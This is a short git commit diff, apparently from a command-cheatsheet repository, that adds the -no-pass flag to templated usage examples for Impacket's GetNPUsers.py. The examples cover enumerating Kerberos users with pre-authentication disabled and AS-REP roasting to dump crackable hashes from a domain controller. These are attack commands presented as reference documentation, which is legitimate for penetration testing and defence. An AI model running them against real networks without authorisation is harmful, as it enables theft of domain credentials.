GetNPUsers.py: fix examples (#16864)

This commit is contained in:
Machiavelli
2025-06-15 18:28:47 +03:00
committed by GitHub
parent 4f9e037b15
commit 2fbbd55ea4
2 changed files with 4 additions and 4 deletions
+2 -2
View File
@@ -6,11 +6,11 @@
- Enumerate users with Kerberos pre-authentication disabled (default anonymous enumeration):
`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}}`
`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}} -no-pass`
- Perform AS-REP roasting and dump crackable hashes for offline cracking:
`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}} -request`
`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}} -no-pass -request`
- Authenticate with valid credentials (if anonymous binding is disabled):